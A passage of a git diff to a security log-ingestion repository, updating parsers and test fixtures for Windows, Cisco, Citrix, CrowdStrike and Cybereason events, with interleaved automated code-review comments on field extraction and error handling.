Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was 
enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 
(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", 
+ "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/CatoNetworks/cato-sase/ingest/parser.yml b/CatoNetworks/cato-sase/ingest/parser.yml index c3559d563..73f02ca34 100644 --- a/CatoNetworks/cato-sase/ingest/parser.yml +++ b/CatoNetworks/cato-sase/ingest/parser.yml 
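Review bot: The expected output of the new `security_event_4798.json` fixture pins `related.user` to `["ACC0123"]` only, although the same record carries the enumerated account as `user.target.name: "Guest"`; a hunt on the related-entity list for the account whose group membership was enumerated will therefore not surface this event. That is a parser decision the fixture now freezes rather than a defect in the fixture itself, so either the related-user stage (outside this diff) should also push the target name, or the omission should be stated where that stage is defined. The `input`/`expected` pair is otherwise internally consistent.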
@@ -19,6 +19,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_tactics}}" output_field: message pattern: '%{DATA:tactic_name_1} \(%{DATA:tactic_id_1}\)\, %{DATA:tactic_name_2} \(%{DATA:tactic_id_2}\)' @@ -28,6 +29,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_techniques}}" output_field: message pattern: '%{DATA:technique_name_1} \(%{DATA:technique_id_1}\)\, %{DATA:technique_name_2} \(%{DATA:technique_id_2}\)' diff --git a/Cisco/cisco-esa/_meta/fields.yml b/Cisco/cisco-esa/_meta/fields.yml index 144a3c222..3ea23bd6f 100644 --- a/Cisco/cisco-esa/_meta/fields.yml +++ b/Cisco/cisco-esa/_meta/fields.yml @@ -121,6 +121,11 @@ cisco.esa.url: name: cisco.esa.url type: keyword +cisco.esa.url_domain: + description: '' + name: cisco.esa.url_domain + type: keyword + email.attachments: description: A list of objects describing the attachment files sent along with an email message diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 67b76402f..38469cd70 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -32,6 +32,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.ExternalMsgID}}" output_field: message pattern: "<%{MESSAGE_ID}>|%{MESSAGE_ID}" @@ -42,6 +43,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.duser}}" output_field: message pattern: "%{GREEDYDATA:duser_name}@%{GREEDYDATA:duser_domain}" @@ -50,6 +52,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.suser}}" output_field: message pattern: "%{GREEDYDATA:suser_name}@%{GREEDYDATA:suser_domain}" 
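Review bot: In the `Cisco/cisco-esa/_meta/fields.yml` hunk, `cisco.esa.url_domain` is added with `description: ''`, so the new field enters the intake's field catalogue undocumented while the neighbouring `email.attachments` entry shows the expected style. Suggest `description: Domains extracted from the URLs found in the message (the original URL and, when present, its expanded form)`, which is what the `cisco.esa.url_domain` stage introduced in this commit actually produces.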
@@ -67,6 +70,7 @@ pipeline: external: name: dict.parse properties: + output_field: message input_field: > {{ parsed_event.message.ESAURLDetails }} @@ -209,11 +213,6 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url: >- - [{% for url, details in dict(json_event_url_details.message).items() %} - "{% if details.get('ExpandedUrl') is not none %}{{ details.ExpandedUrl }}{% else %}{{ url }}{% endif %}" - {% if not loop.last %},{% endif %} - {% endfor %}] url.domain: "{{parsed_event.message.EAURLDetails}}" cisco.esa.delivery.connection_id: "{{parsed_event.message.ESADCID}}" cisco.esa.injection.connection_id: "{{parsed_event.message.ESAICID}}" @@ -232,6 +231,19 @@ stages: cisco.esa.helo.ip: "{{parsed_event.message.ESAHeloIP}}" filter: "{{parsed_event.message.ESAHeloIP | is_ipaddress}}" + - set: + cisco.esa.url_domain: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + cisco.esa.url: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + filter: "{{json_event_url_details.message | length > 0}}" + - set: cisco.esa.helo.domain: "{{parsed_event.message.ESAHeloDomain}}" cisco.esa.sender_group: "{{parsed_event.message.ESASenderGroup}}" diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 56ac98c83..ce0d1d1b3 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json 
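Review bot: In the `@@ -232,6 +231,19 @@` hunk the domain is derived with `replace('https://','').replace('http://','').split('/')[0]`, which is not a host extraction: a URL carrying userinfo (`user@host`) or an explicit port yields `user@host` or `host:8443` instead of a bare domain, and an upper-case `HTTPS://` prefix is not stripped at all, so `HTTPS:` ends up as the "domain". Since `cisco.esa.url_domain` is precisely the field detection rules and allow/deny lists will match on, those values should be normalised before they are emitted. Lower-casing first, then dropping userinfo and port, keeps the existing fixtures (`schemas.microsoft.com`, `www.twitter.com`, …) unchanged; the rewritten `cisco.esa.url_domain` value is below, the `cisco.esa.url` value and the `filter` line stay as committed.

```yaml
  - set:
      cisco.esa.url_domain: >-
        [{% for url, details in json_event_url_details.message.items() %}
        {%- set url_host = (url | lower).replace('https://','').replace('http://','').split('/')[0].split('@')[-1].split(':')[0] -%}
        {% if details.get('ExpandedUrl') is not none %}"{{ url_host }}", "{{ (details.ExpandedUrl | lower).replace('https://','').replace('http://','').split('/')[0].split('@')[-1].split(':')[0] }}"{% else %}"{{ url_host }}"{% endif %}
        {% if not loop.last %},{% endif %}
        {% endfor %}]
      # … unchanged: cisco.esa.url and filter …
```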
@@ -58,6 +58,10 @@ "url": [ "http://schemas.microsoft.com/office/2004/12/omml", "http://www.w3.org/TR/REC-html40" + ], + "url_domain": [ + "schemas.microsoft.com", + "www.w3.org" ] } }, diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index afb99f16d..4dbc8fa48 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -61,6 +61,10 @@ "url": [ "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ], + "url_domain": [ + "bce-demo.appc.cisco.com", + "mandrill.appc.cisco.com" ] } }, diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 553425b45..46ca9ebb4 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -55,6 +55,13 @@ "url": [ "https://facebook.com/u/john.doe", "https://tiktok.com", + "https://tinyurl.es/tbdra", + "www.twitter.com" + ], + "url_domain": [ + "facebook.com", + "tiktok.com", + "tinyurl.es", "www.twitter.com" ] } diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 29716af19..b77951dcf 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,8 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [] + } } }, "email": { diff --git a/Cisco/cisco-ios/ingest/parser.yml b/Cisco/cisco-ios/ingest/parser.yml index dace57b15..84cce9666 100644 --- a/Cisco/cisco-ios/ingest/parser.yml +++ b/Cisco/cisco-ios/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{LINEPROTO}|%{LINK}" custom_patterns: 
@@ -24,6 +25,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{SEC_LOGIN_SUCCESS}|%{SYS_LOGIN_FAILURE}|%{SYS_LOGOUT}|%{SYS_TTY_EXPIRE_TIMER}" custom_patterns: @@ -34,6 +36,7 @@ pipeline: filter: '{{parsed_event.message.facility in ["SEC_LOGIN", "SYS"]}}' - name: parsed_description external: + raise_errors: false name: grok.match properties: input_field: parsed_event.message.description diff --git a/Cisco/cisco-nx-os/ingest/parser.yml b/Cisco/cisco-nx-os/ingest/parser.yml index 5b8fe2aee..b9f586e96 100644 --- a/Cisco/cisco-nx-os/ingest/parser.yml +++ b/Cisco/cisco-nx-os/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ETHPORT_IF_DOWN}|%{ETHPORT_IF_UP}|%{ETHPORT_IF}|%{ETHPORT_CONTROL}|%{ETHPORT_LAN}|%{ETHPORT_TRANSCEIVER}|%{ETHPORT_CHANNEL}" custom_patterns: @@ -30,6 +31,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{PAM_MESSAGE}|%{FILE_OPEN_FAILURE}" custom_patterns: @@ -42,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{VSHD_CONFIG}|%{VSHD_CMD_EXEC}" custom_patterns: @@ -53,6 +56,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ARP_DUP}" custom_patterns: diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 9c6c377a7..6fead398e 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml 
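Review bot: In the third `cisco-ios` hunk (`@@ -34,6 +36,7 @@`, the `parsed_description` step) `raise_errors: false` is inserted directly under `external:` next to `name: grok.match`, whereas every other step touched by this commit — including the two earlier hunks in the same file — places it under `properties:`. Unless the `external` block accepts that key, which none of the other changes suggest, this occurrence is either ignored or rejected by the schema and the `parsed_description` grok keeps raising on descriptions that match none of its patterns. Move the line so the block reads `properties:` / `raise_errors: false` / `input_field: parsed_event.message.description`. The rest of that step's properties continue outside the hunk.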
@@ -90,7 +90,7 @@ pipeline: CIPHER_SUITE: '"?"?[\w\-\.]+"?"?' - name: set_audit_log_fields - filter: '{{not original.message.startswith("CEF")}}' + filter: '{{not original.message.startswith("CEF") and parse_audit_header.message.type not in ["AAATM"]}}' - name: set_connection_log_fields filter: "{{ parse_audit_header.message.type == 'TCP' }}" @@ -105,7 +105,7 @@ pipeline: filter: "{{ parse_audit_header.message.type == 'SSLLOG' }}" - name: set_other_log_fields - filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP'] }}" + filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP', 'AAATM'] }}" stages: set_cef_header_fields: @@ -113,17 +113,21 @@ stages: - set: event.kind: "alert" event.dataset: "alert" + - set: observer.vendor: "{{parsed_event.message.DeviceVendor}}" observer.product: "{{parsed_event.message.DeviceProduct}}" observer.version: "{{parsed_event.message.DeviceVersion}}" + - set: source.ip: "{{parsed_event.message.src}}" source.port: "{{parsed_event.message.spt}}" + - set: event.reason: "{{parsed_event.message.msg}}" event.action: "{{parsed_event.message.act}}" event.category: ["network"] + - set: url.original: "{{parsed_event.message.request}}" - set: diff --git a/Citrix/citrix-adc/tests/test_aaatm.json b/Citrix/citrix-adc/tests/test_aaatm.json index 8db673e24..abc914658 100644 --- a/Citrix/citrix-adc/tests/test_aaatm.json +++ b/Citrix/citrix-adc/tests/test_aaatm.json 
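Review bot: Excluding `AAATM` from both `set_audit_log_fields` and `set_other_log_fields` leaves AAATM audit records with no stage at all, so they lose `@timestamp`, `event.code`, `event.dataset` and `observer.name`; the updated `test_aaatm.json` in the next hunk confirms the only output is now the `No fields extracted from original event` warning. If the goal is to stop tagging these parser-debug messages as network connections, a dedicated `set_aaatm_log_fields` stage that keeps the timestamp and `event.dataset: audit_aaatm` but omits `event.category: network` / `event.type: connection` would keep them searchable; if the goal is to drop them, a comment next to the new filter should say so. Minor: `parse_audit_header.message.type not in ["AAATM"]` on a single value reads more naturally as `parse_audit_header.message.type != "AAATM"`.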
@@ -4,20 +4,12 @@ }, "expected": { "message": "09/29/2023:07:40:56 GMT ADC 0-PPE-1 : default AAATM Message 1111111111 0 : \"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "event": { - "category": [ - "network" - ], - "code": "Message", - "dataset": "audit_aaatm", - "reason": "\"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "type": [ - "connection" - ] - }, - "@timestamp": "2023-09-29T07:40:56Z", - "observer": { - "name": "ADC" + "sekoiaio": { + "intake": { + "parsing_warnings": [ + "No fields extracted from original event" + ] + } } } } \ No newline at end of file diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index f5da81755..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -177,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 82baec896..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json 
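Review bot: In the `crowdstrike-telemetry` hunk, `process.command_line` now falls back to `ContextBaseFileName`, which is a bare image file name rather than a command line, so events without `CommandLine` get a value with different semantics in that field (the updated `telemetry_event_26.json` fixture shows `command_line: "svchost.exe"`). Rules that tokenise `process.command_line` for arguments will see an argv[0] with no flags and may match or miss on that basis; the fallback is appropriate for `process.name`, but the command line should stay `"process.command_line": "{{parsed_event.message.CommandLine}}"`. The `ImageFileName | basename or ContextBaseFileName` expression relies on Jinja binding `|` tighter than `or`, which is correct but deserves a one-line comment since the precedence is easy to misread.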
+++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -33,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" diff --git a/CybeReason/malop-json/_meta/manifest.yml b/CybeReason/malop-json/_meta/manifest.yml index 90a4a3f95..3cd3f3080 100644 --- a/CybeReason/malop-json/_meta/manifest.yml +++ b/CybeReason/malop-json/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: 9f89b634-0531-437b-b060-a9d9f2d270db name: Cybereason EDR slug: cybereason-malop-json -automation_connector_uuid: ff092b32-68dc-11ee-8c99-0242ac120002 +automation_connector_uuid: 8128d255-22df-4f4c-96af-ca6c1123f4cf automation_module_uuid: b96361fb-a01b-4ae7-8927-9622b9ea0acf description: >- Cybereason detect and prevent attack targeting endpoints. diff --git a/CybeReason/malop-json/ingest/parser.yml b/CybeReason/malop-json/ingest/parser.yml index 80803a753..5eb538561 100644 --- a/CybeReason/malop-json/ingest/parser.yml +++ b/CybeReason/malop-json/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.name}}" output_field: technique pattern: "%{TID:id} - %{DATA:name} : %{DATA}" 
@@ -61,19 +62,43 @@ stages: - set: observer.vendor: "Cybereason" observer.product: "Cybereason" + handle_malop: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.lastUpdateTime != null}}" + - set: file.name: "{{parsed_event.message.primaryRootCauseName}}" file.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "File"}}' + - set: process.name: "{{parsed_event.message.primaryRootCauseName}}" process.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "Process"}}' + + - set: + host.os.type: "{{parsed_event.message.machines[0].get('osType', '').lower()}}" + host.name: "{{parsed_event.message.machines[0].get('displayName')}}" + host.domain: "{{parsed_event.message.machines[0].get('adDNSHostName')}}" + cybereason.malop.host.id: "{{parsed_event.message.machines[0].get('guid')}}" + cybereason.malop.host.is_online: "{{parsed_event.message.machines[0].get('connected')}}" + cybereason.malop.host.is_isolated: "{{parsed_event.message.machines[0].get('isolated')}}" + filter: "{{parsed_event.message.get('machines', []) != []}}" + + - set: + user.name: "{{parsed_event.message.users[0].get('displayName')}}" + cybereason.malop.user.id: "{{parsed_event.message.users[0].get('guid')}}" + cybereason.malop.user.is_admin: "{{parsed_event.message.users[0].get('admin')}}" + filter: "{{parsed_event.message.get('users', []) != []}}" + + - set: + user.name: '{{parsed_event.message.users[0].displayName.split("\\")[1]}}' + user.domain: '{{parsed_event.message.users[0].displayName.split("\\")[0]}}' + filter: '{{parsed_event.message.get("users", []) != [] and "\\" in parsed_event.message.users[0].get("displayName")}}' + - set: event.kind: "alert" event.category: ["malware"] 
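Review bot: The new `machines`/`users` blocks guard on `parsed_event.message.get('machines', []) != []`, which only covers a missing key: a present-but-null `machines` (or `users`) passes the filter and `machines[0]` then fails, and `get('osType', '').lower()` fails the same way when `osType` is present but null — whether that aborts the whole stage depends on the engine's template error handling, which this diff does not show. The last filter, `"\\" in parsed_event.message.users[0].get("displayName")`, likewise raises on a null `displayName`. Truthiness-based guards avoid all three cases, e.g. `filter: "{{parsed_event.message.get('machines') and parsed_event.message.machines[0] != null}}"` and `"\\" in (parsed_event.message.users[0].get("displayName") or "")`. Only `machines[0]`/`users[0]` are mapped; if a Malop can list several machines the rest are dropped silently, so a comment stating the first-entry choice would help the next reader.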
@@ -88,22 +113,28 @@ stages: cybereason.malop.root_cause.type: "{{parsed_event.message.rootCauseElementType}}" cybereason.malop.root_cause.name: "{{parsed_event.message.primaryRootCauseName}}" cybereason.malop.is_edr: "{{parsed_event.message.edr}}" + - set: cybereason.malop.created_at: "{{parsed_creation_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + - set: cybereason.malop.modified_at: "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.creationTime != null}}" + - set: cybereason.malop.closed_at: "{{parsed_closing_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + handle_model: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.metadata.timestamp != null}}" + - set: cybereason.malop.id: "{{parsed_event.message.metadata.malopGuid}}" + handle_machine_model: actions: - set: @@ -118,6 +149,7 @@ stages: - set: host.os.type: "{{parsed_event.message.osType.lower()}}" filter: "{{parsed_event.message.osType != null}}" + handle_user_model: actions: - set: @@ -127,10 +159,12 @@ stages: user.name: "{{parsed_event.message.displayName}}" cybereason.malop.user.id: "{{parsed_event.message.guid}}" cybereason.malop.user.is_admin: "{{parsed_event.message.admin}}" + - set: user.name: '{{parsed_event.message.displayName.split("\\")[1]}}' user.domain: '{{parsed_event.message.displayName.split("\\")[0]}}' filter: '{{parsed_event.message.displayName != null and "\\" in parsed_event.message.displayName}}' + handle_file_suspect_model: actions: - set: diff --git a/CybeReason/malop-json/tests/test_malop.json b/CybeReason/malop-json/tests/test_malop.json index b7ad07bb9..a5df9c14f 100644 --- a/CybeReason/malop-json/tests/test_malop.json +++ b/CybeReason/malop-json/tests/test_malop.json 
@@ -24,6 +24,11 @@ ], "type": "CUSTOM_RULE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": true + }, "id": "11.-6654920844431693523", "is_edr": "true", "modified_at": "2022-11-20T12:02:17.625000Z", @@ -33,7 +38,17 @@ "type": "Process" }, "severity": "High", - "status": "Active" + "status": "Active", + "user": { + "id": "0.2548072792133848559", + "is_admin": true + } + } + }, + "host": { + "name": "win-cybereason", + "os": { + "type": "windows" } }, "observer": { @@ -42,6 +57,15 @@ }, "process": { "name": "cymulateagent.exe" + }, + "related": { + "user": [ + "administrator" + ] + }, + "user": { + "domain": "win-cybereason", + "name": "administrator" } } } \ No newline at end of file diff --git a/CybeReason/malop-json/tests/test_malop_detail.json b/CybeReason/malop-json/tests/test_malop_detail.json index a009d865f..532ff8e73 100644 --- a/CybeReason/malop-json/tests/test_malop_detail.json +++ b/CybeReason/malop-json/tests/test_malop_detail.json @@ -24,6 +24,11 @@ ], "type": "KNOWN_MALWARE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": false + 